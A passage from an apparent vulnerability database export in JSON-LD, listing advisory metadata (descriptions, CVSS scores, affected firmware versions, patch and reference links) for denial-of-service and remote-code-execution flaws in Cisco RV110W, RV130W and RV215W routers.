},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201606-365"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Cisco Wireless-N VPN Device firmware buffer overflow vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-003417"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201606-365"
}
],
"trust": 0.6
}
}
var-201906-0682
Vulnerability from variot
A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to cause a reload of an affected device, resulting in a denial of service (DoS) condition. This vulnerability is due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device. A successful exploit could allow the attacker to reload the device and causing a DoS condition. The RV215W is a Wireless-N VPN router from Cisco. A denial of service vulnerability exists in the Web-based management interface of Cisco RV110W versions prior to 1.2.2.4, versions prior to RV130W 1.0.3.51, and versions prior to RV215W 1.3.1.4. Cisco RV110W, RV130W, and RV215W Routers are prone to a denial-of-service vulnerability. This issue is being tracked by Cisco Bug IDs CSCvo21850, CSCvo39082 and CSCvo39087
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201906-0682",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rv110w",
"scope": "lt",
"trust": 1.6,
"vendor": "cisco",
"version": "1.2.2.4"
},
{
"model": "rv130w",
"scope": "lt",
"trust": 1.6,
"vendor": "cisco",
"version": "1.0.3.51"
},
{
"model": "rv215w",
"scope": "lt",
"trust": 1.6,
"vendor": "cisco",
"version": "1.3.1.4"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "rv130w wireless-n multifunction vpn routerr",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w wireless-n vpn router",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w wireless-n vpn router",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "1.3.1.1"
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "1.0.3.45"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "1.2.2.1"
},
{
"model": "rv215w wireless-n vpn router",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "1.3.1.4"
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "1.0.3.51"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "1.2.2.4"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-18734"
},
{
"db": "BID",
"id": "108864"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005776"
},
{
"db": "NVD",
"id": "CVE-2019-1843"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:cisco:rv110w_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:rv130w_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:rv215w_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-005776"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "T. Shiomitsu of Pen Test Partners LLP.",
"sources": [
{
"db": "BID",
"id": "108864"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-799"
}
],
"trust": 0.9
},
"cve": "CVE-2019-1843",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2019-1843",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.8,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CNVD-2019-18734",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-150775",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2019-1843",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "ykramarz@cisco.com",
"availabilityImpact": "HIGH",
"baseScore": 8.6,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2019-1843",
"impactScore": 4.0,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-1843",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "ykramarz@cisco.com",
"id": "CVE-2019-1843",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2019-1843",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2019-18734",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201906-799",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-150775",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-18734"
},
{
"db": "VULHUB",
"id": "VHN-150775"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005776"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-799"
},
{
"db": "NVD",
"id": "CVE-2019-1843"
},
{
"db": "NVD",
"id": "CVE-2019-1843"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to cause a reload of an affected device, resulting in a denial of service (DoS) condition. This vulnerability is due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device. A successful exploit could allow the attacker to reload the device and causing a DoS condition. The RV215W is a Wireless-N VPN router from Cisco. A denial of service vulnerability exists in the Web-based management interface of Cisco RV110W versions prior to 1.2.2.4, versions prior to RV130W 1.0.3.51, and versions prior to RV215W 1.3.1.4. Cisco RV110W, RV130W, and RV215W Routers are prone to a denial-of-service vulnerability. \nThis issue is being tracked by Cisco Bug IDs CSCvo21850, CSCvo39082 and CSCvo39087",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-1843"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005776"
},
{
"db": "CNVD",
"id": "CNVD-2019-18734"
},
{
"db": "BID",
"id": "108864"
},
{
"db": "VULHUB",
"id": "VHN-150775"
}
],
"trust": 2.52
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-1843",
"trust": 3.4
},
{
"db": "BID",
"id": "108864",
"trust": 2.0
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005776",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201906-799",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2019-18734",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.2190",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-150775",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-18734"
},
{
"db": "VULHUB",
"id": "VHN-150775"
},
{
"db": "BID",
"id": "108864"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005776"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-799"
},
{
"db": "NVD",
"id": "CVE-2019-1843"
}
]
},
"id": "VAR-201906-0682",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-18734"
},
{
"db": "VULHUB",
"id": "VHN-150775"
}
],
"trust": 1.2914166040000001
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-18734"
}
]
},
"last_update_date": "2024-11-23T22:06:10.306000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "cisco-sa-20190619-rvrouters-dos",
"trust": 0.8,
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190619-rvrouters-dos"
},
{
"title": "Cisco RV110W, RV130W, RV215W Management Interface Denial of Service Vulnerability Patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/164085"
},
{
"title": "Multiple Cisco Product input verification error vulnerability fixes",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=93949"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-18734"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005776"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-799"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-20",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-150775"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005776"
},
{
"db": "NVD",
"id": "CVE-2019-1843"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190619-rvrouters-dos"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/108864"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-1843"
},
{
"trust": 0.9,
"url": "http://www.cisco.com/"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-1843"
},
{
"trust": 0.6,
"url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190619-rv-dos"
},
{
"trust": 0.6,
"url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190619-rv-infodis"
},
{
"trust": 0.6,
"url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190619-rv-fileaccess"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.2190/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-18734"
},
{
"db": "VULHUB",
"id": "VHN-150775"
},
{
"db": "BID",
"id": "108864"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005776"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-799"
},
{
"db": "NVD",
"id": "CVE-2019-1843"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-18734"
},
{
"db": "VULHUB",
"id": "VHN-150775"
},
{
"db": "BID",
"id": "108864"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005776"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-799"
},
{
"db": "NVD",
"id": "CVE-2019-1843"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-18734"
},
{
"date": "2019-06-20T00:00:00",
"db": "VULHUB",
"id": "VHN-150775"
},
{
"date": "2019-06-19T00:00:00",
"db": "BID",
"id": "108864"
},
{
"date": "2019-06-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-005776"
},
{
"date": "2019-06-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-799"
},
{
"date": "2019-06-20T03:15:11.853000",
"db": "NVD",
"id": "CVE-2019-1843"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-18734"
},
{
"date": "2019-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-150775"
},
{
"date": "2019-06-19T00:00:00",
"db": "BID",
"id": "108864"
},
{
"date": "2019-06-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-005776"
},
{
"date": "2019-06-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-799"
},
{
"date": "2024-11-21T04:37:30.880000",
"db": "NVD",
"id": "CVE-2019-1843"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-799"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Cisco Product Input validation vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-005776"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "108864"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-799"
}
],
"trust": 0.9
}
}
var-202007-1015
Vulnerability from variot
Multiple vulnerabilities in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, RV130 VPN Router, RV130W Wireless-N Multifunction VPN Router, and RV215W Wireless-N VPN Router could allow an authenticated, remote attacker to execute arbitrary code on an affected device. The vulnerabilities are due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit these vulnerabilities by sending malicious HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code on the underlying operating system of the affected device as a high-privilege user. plural Cisco RV A buffer error vulnerability exists in series routers.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Cisco RV110W Wireless-N VPN Firewall is an enterprise-class router of Cisco (Cisco).
A buffer overflow vulnerability exists in the Web management interface of many Cisco products. The vulnerability is caused by the program's failure to correctly verify user data
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202007-1015",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rv110w wireless-n vpn firewall",
"scope": null,
"trust": 1.4,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w wireless-n vpn router",
"scope": null,
"trust": 1.4,
"vendor": "cisco",
"version": null
},
{
"model": "rv130 vpn router",
"scope": null,
"trust": 1.4,
"vendor": "cisco",
"version": null
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "1.2.2.8"
},
{
"model": "rv215w",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "1.3.1.7"
},
{
"model": "rv130w",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "1.0.3.55"
},
{
"model": "rv130",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "1.0.3.55"
},
{
"model": "rv130w wireless-n multifunction vpn routerr",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-41233"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-008402"
},
{
"db": "NVD",
"id": "CVE-2020-3146"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:cisco:rv110w_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:rv130w_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:rv215w_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:rv130_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-008402"
}
]
},
"cve": "CVE-2020-3146",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CVE-2020-3146",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "JVNDB-2020-008402",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2020-41233",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2020-3146",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "ykramarz@cisco.com",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2020-3146",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2020-008402",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-3146",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "ykramarz@cisco.com",
"id": "CVE-2020-3146",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2020-008402",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2020-41233",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202007-1081",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-41233"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-008402"
},
{
"db": "CNNVD",
"id": "CNNVD-202007-1081"
},
{
"db": "NVD",
"id": "CVE-2020-3146"
},
{
"db": "NVD",
"id": "CVE-2020-3146"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple vulnerabilities in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, RV130 VPN Router, RV130W Wireless-N Multifunction VPN Router, and RV215W Wireless-N VPN Router could allow an authenticated, remote attacker to execute arbitrary code on an affected device. The vulnerabilities are due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit these vulnerabilities by sending malicious HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code on the underlying operating system of the affected device as a high-privilege user. plural Cisco RV A buffer error vulnerability exists in series routers.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Cisco RV110W Wireless-N VPN Firewall is an enterprise-class router of Cisco (Cisco). \n\r\n\r\nA 